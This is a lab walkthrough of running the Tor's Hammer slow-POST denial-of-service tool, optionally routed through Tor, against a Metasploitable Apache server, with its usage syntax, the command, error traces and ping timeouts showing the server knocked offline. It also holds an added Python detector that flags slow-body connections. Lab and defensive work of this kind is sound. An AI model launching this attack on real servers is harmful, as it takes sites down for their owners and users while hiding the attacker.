Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.
Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared Content-Length (like 1000 MB), then repeating the following, ad infinitum: send one letter through the open connection; take a nap.
Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.
NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.
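Seen from the server side, the slow body pattern described above is an unfinished POST body that outlives any reasonable time budget. The following added example (not part of torshammer or of the original page) flags such connections with a budget of a base window plus one second per `min_rate` bytes received, the shape used by Apache's `mod_reqtimeout` setting `RequestReadTimeout body=20,MinRate=500`; the record fields, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import Counter
from typing import NamedTuple

class PostConn(NamedTuple):
    client: str           # source address of the connection
    content_length: int   # Content-Length declared in the request headers
    body_received: int    # body bytes received so far
    body_elapsed: float   # seconds since the request headers were complete

def body_deadline(received, initial=20.0, min_rate=500):
    """Allowed body time: a base window plus 1 s per min_rate bytes received."""
    return initial + received / min_rate

def is_slow_body(conn, initial=20.0, min_rate=500):
    """True when an unfinished body has outlived its time budget."""
    if conn.body_received >= conn.content_length:
        return False  # body complete, nothing is being held open
    return conn.body_elapsed > body_deadline(conn.body_received, initial, min_rate)

def eta_seconds(conn):
    """Seconds left to finish the body at the observed average rate."""
    if conn.body_received == 0 or conn.body_elapsed <= 0:
        return float("inf")  # no usable rate yet
    rate = conn.body_received / conn.body_elapsed
    return (conn.content_length - conn.body_received) / rate

def stalled_by_client(conns, **policy):
    """Count flagged connections per client address."""
    return dict(Counter(c.client for c in conns if is_slow_body(c, **policy)))

# Constructed sample observations (not captured traffic).
SAMPLE = [
    PostConn("192.0.2.10", 1_000_000_000, 30, 90.0),     # 1 byte every 3 s
    PostConn("192.0.2.10", 1_000_000_000, 45, 135.0),
    PostConn("192.0.2.10", 1_000_000_000, 10, 30.0),
    PostConn("192.0.2.20", 5_000_000, 2_500_000, 12.0),  # ordinary upload
    PostConn("192.0.2.30", 200_000, 60_000, 100.0),      # slow but progressing
    PostConn("192.0.2.20", 1_000, 1_000, 50.0),          # body complete
]

if __name__ == "__main__":
    print(stalled_by_client(SAMPLE))
    print(f"ETA of first flagged connection: {eta_seconds(SAMPLE[0]):.0f} s")
```

The slow-but-progressing client stays inside its budget because every 500 bytes it delivers buys another second, while the one-byte-at-a-time connections would need roughly 95 years to finish the declared body. When the traffic arrives through a proxy network, the per-client count is less useful than the per-connection check.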
Python Script
To run this attack, use the torshammer.py script from the link above.
$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256
Run this against the IP address of the Metasploitable machine, 10.0.0.27:
# python torshammer.py -t 10.0.0.27
This will run with the default number of threads (256).
Results
This works like a charm, bringing the target 10.0.0.27 to its knees:
Bingo!
Note that there are a large number of errors printed:

error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
Bringing Down The Server
Ping Down
At some point during the attack, the machine stopped responding to ping:
ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907
Memory Squeeze
Turns out, the machine ran out of memory, and the network device began dropping packets:
This attack completely knocked the server offline, and it had to be rebooted.
To be sure: this attack can pwn a server.